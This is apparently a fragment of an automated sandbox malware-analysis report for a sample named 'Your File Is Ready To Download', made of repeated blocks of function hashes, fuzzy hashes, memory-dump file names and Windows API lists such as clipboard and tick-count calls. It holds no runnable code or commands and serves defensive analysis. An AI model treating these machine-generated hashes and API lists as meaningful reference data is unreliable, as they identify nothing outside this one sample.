                                                                                                                                                                                                                          • Instruction ID: 6058890c046a82a14f497ed60f86a1f8cb736b17547c07c46e52349af7b944a6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c8a7ee879b48b2ec7b0480daebcb0192a30f2a69fd74caba8c10a8c3583dfb64
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 52913831604B4486EB6B8B27E8443DA77A2F78DBD4F544116EB9987BF5DB39C881C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTickWindow$ClipboardCloseForegroundGlobalIconicMessagePeekShowUnlockVisible
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1891409732-0
                                                                                                                                                                                                                          • Opcode ID: 0465e4a95f92ed67ccb7e4f578d12c75a3b0872968327a44c31614cdc7bac2e4
                                                                                                                                                                                                                          • Instruction ID: 3e954db6ac7355a0dbe133a97fa94425093ccbcf169e0c9639670f2e08053b37
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0465e4a95f92ed67ccb7e4f578d12c75a3b0872968327a44c31614cdc7bac2e4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 08913A31604B4086FB6B8B27A8543EA77A1F78DBE4F544216FB5A47AF5DB38C885C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$FullNamePath$AttributesClipboardCloseFileGlobalMessagePeekUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1989334333-0
                                                                                                                                                                                                                          • Opcode ID: f8bb2da6540411c1b82a694d2a3b746ed80d84e8c7036d342ca8570873a50bb0
                                                                                                                                                                                                                          • Instruction ID: 76f2ecb1062d5dcedf52178b25f13d14acaa9c603a1a73c68c5d17501603a671
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f8bb2da6540411c1b82a694d2a3b746ed80d84e8c7036d342ca8570873a50bb0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 33915931604B4086FB6B8B27A8543EA77A2F78DBD4F544116FB5A87AF5DB38C885C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1623861271-0
                                                                                                                                                                                                                          • Opcode ID: db4ee09c7023b87c287fc6a20000f74ffeff2ebaee8e54b4a3b864779c5b6335
                                                                                                                                                                                                                          • Instruction ID: ecd1b036ee722e715201a1e110facc4cb23219e1f20d30456fb2ce1751f69542
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: db4ee09c7023b87c287fc6a20000f74ffeff2ebaee8e54b4a3b864779c5b6335
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 64912971604B408AFB6B8B27E8443DA77A2F78DBE4F544116EB59876F5DB38C885C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1623861271-0
                                                                                                                                                                                                                          • Opcode ID: ee2bf2d2c024c568236b69f1599bb920f43235cf0abb5fd710fd05255e6c37ef
                                                                                                                                                                                                                          • Instruction ID: 39895a4f2c7261bd753653019f1ebd794d74b76e992f4fe1f840a2f045a6e7e3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ee2bf2d2c024c568236b69f1599bb920f43235cf0abb5fd710fd05255e6c37ef
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D3918E32604B4486FB6B8B2AA8443EA77A1FB8DBE4F544215EF59476F5DB38C885C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$Window$ClipboardCloseGlobalMessageMovePeekRectUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1284534901-0
                                                                                                                                                                                                                          • Opcode ID: 56a85a025b80bd6e0c17e0f922f6a0556dc46b6fb9a515dd913b0abd341d0c21
                                                                                                                                                                                                                          • Instruction ID: 87f8e470e84c9d3b49cf766c51b98ce5622bf8921297aef2a873994146d078ba
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 56a85a025b80bd6e0c17e0f922f6a0556dc46b6fb9a515dd913b0abd341d0c21
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C4913831604B4086EB6B8B27E8443DA77A2F78DBE4F544116EB9987BF5DB39C885C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0000000140080A40: GetFullPathNameW.KERNEL32(?,?,?,?,?,000000014003716B), ref: 0000000140080A7C
                                                                                                                                                                                                                            • Part of subcall function 0000000140080A40: GetFullPathNameW.KERNEL32(?,?,?,?,?,000000014003716B), ref: 0000000140080AC1
                                                                                                                                                                                                                            • Part of subcall function 0000000140080A40: GetFileAttributesW.KERNEL32(?,?,?,?,?,000000014003716B), ref: 0000000140080AF9
                                                                                                                                                                                                                            • Part of subcall function 0000000140080A40: GetFileAttributesW.KERNEL32(?,?,?,?,?,000000014003716B), ref: 0000000140080B35
                                                                                                                                                                                                                            • Part of subcall function 0000000140080A40: FindFirstFileW.KERNEL32(?,?,?,?,?,000000014003716B), ref: 0000000140080B76
                                                                                                                                                                                                                            • Part of subcall function 0000000140080A40: GetLastError.KERNEL32(?,?,?,?,?,000000014003716B), ref: 0000000140080B85
                                                                                                                                                                                                                          • GlobalUnlock.KERNEL32 ref: 0000000140031FF1
                                                                                                                                                                                                                          • CloseClipboard.USER32 ref: 0000000140031FFE
                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 0000000140032011
                                                                                                                                                                                                                          • PeekMessageW.USER32 ref: 0000000140032045
                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 0000000140032059
                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 0000000140032127
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountFileTick$AttributesFullNamePath$ClipboardCloseErrorFindFirstGlobalLastMessagePeekUnlock_itow
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 446227350-0
                                                                                                                                                                                                                          • Opcode ID: b31bdc009e76ca0c2f6435cdb588670db79906b9cdb1e3206094a39acf3bf635
                                                                                                                                                                                                                          • Instruction ID: d3fde14aa1f17386e64b1472ea3c9bb8c40fc715db2735754d768e4e5ed69fda
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b31bdc009e76ca0c2f6435cdb588670db79906b9cdb1e3206094a39acf3bf635
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6F914831604B4086FB6B8B27E8443EA77A2F78DBD4F544216EB5987AF5DB38D885C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1623861271-0
                                                                                                                                                                                                                          • Opcode ID: fac03fcaa0ca78f4ffa0e253e291e45ff1f615a41ff2a7827a6f986a6a2a38f3
                                                                                                                                                                                                                          • Instruction ID: 2e6b548fe90bfb9c8feb9ab482c6d9c1eade020760fccf1f1eb8127702f3bf29
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fac03fcaa0ca78f4ffa0e253e291e45ff1f615a41ff2a7827a6f986a6a2a38f3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 58912731604B4486EB6B8B27A8443DA77A2F78DBD4F544216EB9987BF5DB38C885C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1623861271-0
                                                                                                                                                                                                                          • Opcode ID: 88eb2dc4cfc2a16d3babd051395bf2f9b36b6742ebcc7153ee45e43409ef9ef0
                                                                                                                                                                                                                          • Instruction ID: 3ed907058d03dab00793b2776b2b7592571ada4e4fcafe75cdce311b8a35396c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 88eb2dc4cfc2a16d3babd051395bf2f9b36b6742ebcc7153ee45e43409ef9ef0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A5911831604B4486EB6B8B27A8443DA77A2F78DBE4F544116EB5947BF5DB38C885C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock_wcstoi64wcsncpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2569467992-0
                                                                                                                                                                                                                          • Opcode ID: 3ec7a8a5c1cbe0e479694a790fe1060143f8e704acf9c8db8edc8fc8f04d4e37
                                                                                                                                                                                                                          • Instruction ID: cb97d4fa5daf515643f86601904c792d8324beec538c3ead7fc879156600c094
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3ec7a8a5c1cbe0e479694a790fe1060143f8e704acf9c8db8edc8fc8f04d4e37
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BC912831604B4486EB6B8B27E8443DA77A2F78DBE4F544116EB5987BF5DB38C885C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$Message$ClipboardCloseGlobalPeekSendTimeoutUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3716859204-0
                                                                                                                                                                                                                          • Opcode ID: 25f9f2c6fb8bcb2731fab0fb27143a604483a4b42e94448f4ee181418d713fb8
                                                                                                                                                                                                                          • Instruction ID: 212b7fdcffbbbabce4c06cbc487792d39146d6f66a77b2c049846a6a929a6177
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 25f9f2c6fb8bcb2731fab0fb27143a604483a4b42e94448f4ee181418d713fb8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 05912831604B4486FB6B8B27A8443EA77A2F78DBD4F544216EB5987AF5DB38C885C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1623861271-0
                                                                                                                                                                                                                          • Opcode ID: fcc2f4db933c77916a0339be05c4e8acc8a82a376386f8a2c8f1aee58430ed5f
                                                                                                                                                                                                                          • Instruction ID: 3ca0f5983517bc3204b1e9167e7164e5a66cce40ef74d2f4eb646131241d0141
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fcc2f4db933c77916a0339be05c4e8acc8a82a376386f8a2c8f1aee58430ed5f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CA912931604B4086FB6B8B27A8447DA77A2F78DBD4F544216EB5947AF5DB38C885C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$Window$ClipboardCloseGlobalMessageMovePeekRectUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1284534901-0
                                                                                                                                                                                                                          • Opcode ID: 8f3203945f67b16894492d78359270ec5bc0eb072de02199c70933a878d424f9
                                                                                                                                                                                                                          • Instruction ID: a626e3aa2ef74490c708d56bcdbf065145f08b7ed763e8ae0d42069ad2b1c799
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8f3203945f67b16894492d78359270ec5bc0eb072de02199c70933a878d424f9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B0914A31604B4086FB6B8B27A8443EA77A2F78DBD4F544216FB9947AF5DB38C885C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$RectWindow$ClipboardCloseGlobalMessagePeekUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3440613390-0
                                                                                                                                                                                                                          • Opcode ID: f69b7ca4177a38f853b256c9bb8f42d2eb73f6d2868821b94ce263e8d9d206de
                                                                                                                                                                                                                          • Instruction ID: f4dc59ab47249a61f87e17bd69f098905967f2c83d8a92a9e2ae220de7726b8e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f69b7ca4177a38f853b256c9bb8f42d2eb73f6d2868821b94ce263e8d9d206de
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D913931604B4086FB6B8B27E8443EA77A2F78DBD4F544216EB5987AF5DB38C885C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
